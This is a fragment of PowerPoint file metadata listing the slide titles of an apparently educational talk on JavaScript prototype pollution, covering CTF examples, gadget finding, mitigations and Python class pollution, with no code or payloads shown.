      <vt:lpstr>Prototype 2</vt:lpstr>
      <vt:lpstr>Prototype demonstration</vt:lpstr>
      <vt:lpstr>Prototype 3</vt:lpstr>
      <vt:lpstr>Object.prototype</vt:lpstr>
      <vt:lpstr>Object.prototype 2</vt:lpstr>
      <vt:lpstr>Object.prototype 3</vt:lpstr>
      <vt:lpstr>Object.prototype 4</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Object.prototype.__proto__ [1]</vt:lpstr>
      <vt:lpstr>Object.prototype.__proto__ [1] 2</vt:lpstr>
      <vt:lpstr>Object.prototype.__proto__ [1] 3</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Prototype pollution (blobcat corruption)</vt:lpstr>
      <vt:lpstr>(Almost) all blobcats are entangled.</vt:lpstr>
      <vt:lpstr>Prototypes are shared</vt:lpstr>
      <vt:lpstr>Prototypes are shared demonstration</vt:lpstr>
      <vt:lpstr>Modifying prototype</vt:lpstr>
      <vt:lpstr>Modifying prototype 2</vt:lpstr>
      <vt:lpstr>Modifying prototype 2.2</vt:lpstr>
      <vt:lpstr>Modifying prototype 2.3</vt:lpstr>
      <vt:lpstr>Modifying prototype demonstration</vt:lpstr>
      <vt:lpstr>Prototype pollution</vt:lpstr>
      <vt:lpstr>The end…?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The why and the how</vt:lpstr>
      <vt:lpstr>The why</vt:lpstr>
      <vt:lpstr>The why 2</vt:lpstr>
      <vt:lpstr>The why 3</vt:lpstr>
      <vt:lpstr>The why 4</vt:lpstr>
      <vt:lpstr>The how</vt:lpstr>
      <vt:lpstr>Inputting objects</vt:lpstr>
      <vt:lpstr>Inputting objects 2</vt:lpstr>
      <vt:lpstr>Inputting objects 3</vt:lpstr>
      <vt:lpstr>Inputting objects: "/query"</vt:lpstr>
      <vt:lpstr>Inputting objects: "/body-parser/urlencoded"</vt:lpstr>
      <vt:lpstr>Inputting objects: "/body-parser/urlencoded/unextended"</vt:lpstr>
      <vt:lpstr>Inputting objects: "/body-parser/json"</vt:lpstr>
      <vt:lpstr>Inputting objects 3</vt:lpstr>
      <vt:lpstr>Polluting prototypes</vt:lpstr>
      <vt:lpstr>Polluting prototypes 2</vt:lpstr>
      <vt:lpstr>Polluting prototypes 3</vt:lpstr>
      <vt:lpstr>Polluting prototypes: UTCTF 2024/Easy Mergers</vt:lpstr>
      <vt:lpstr>Polluting prototypes: UTCTF 2024/Easy Mergers 2</vt:lpstr>
      <vt:lpstr>Polluting prototypes 4</vt:lpstr>
      <vt:lpstr>Polluting prototypes: DiceCTF 2024 Quals/funnylogin</vt:lpstr>
      <vt:lpstr>Polluting prototypes: DiceCTF 2024 Quals/funnylogin 2</vt:lpstr>
      <vt:lpstr>Finding gadgets</vt:lpstr>
      <vt:lpstr>Finding gadgets: finding vulnerabilities</vt:lpstr>
      <vt:lpstr>Finding gadgets: arbitrary code execution</vt:lpstr>
      <vt:lpstr>Finding gadgets: Cyber Apocalypse 2021/BlitzProp</vt:lpstr>
      <vt:lpstr>Finding gadgets: Cyber Apocalypse 2021/BlitzProp 2</vt:lpstr>
      <vt:lpstr>Finding gadgets: Cyber Apocalypse 2021/BlitzProp 3</vt:lpstr>
      <vt:lpstr>Finding gadgets: Cyber Apocalypse 2021/BlitzProp 4</vt:lpstr>
      <vt:lpstr>Finding gadgets 2</vt:lpstr>
      <vt:lpstr>Mitigations/obstacles (how to jail hackercat)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Why mitigate and how?</vt:lpstr>
      <vt:lpstr>Property key sanitization</vt:lpstr>
      <vt:lpstr>Property key sanitization 2</vt:lpstr>
      <vt:lpstr>Map and Set</vt:lpstr>
      <vt:lpstr>Map and Set 2</vt:lpstr>
      <vt:lpstr>null-prototype objects</vt:lpstr>
      <vt:lpstr>null-prototype objects 2</vt:lpstr>
      <vt:lpstr>Freezing prototypes</vt:lpstr>
      <vt:lpstr>Freezing prototypes 2</vt:lpstr>
      <vt:lpstr>Remove __proto__</vt:lpstr>
      <vt:lpstr>Remove __proto__ 2</vt:lpstr>
      <vt:lpstr>Mitigations/obstacles</vt:lpstr>
      <vt:lpstr>Generalizations (plot twist)</vt:lpstr>
      <vt:lpstr>Generalizations</vt:lpstr>
      <vt:lpstr>Yes</vt:lpstr>
      <vt:lpstr>Class pollution in Python</vt:lpstr>
      <vt:lpstr>Class pollution in Python demonstration</vt:lpstr>
      <vt:lpstr>Class pollution in Python 2</vt:lpstr>
      <vt:lpstr>Class pollution</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>References (please skip me)</vt:lpstr>
      <vt:lpstr>Credits</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References 2</vt:lpstr>
      <vt:lpstr>References 3</vt:lpstr>
      <vt:lpstr>References 4</vt:lpstr>
      <vt:lpstr>References 5</vt:lpstr>
      <vt:lpstr>QwQ&amp;A (please go easy)</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2024-05-05T19:37:33Z</dcterms:modified>
</cp:coreProperties>
</file>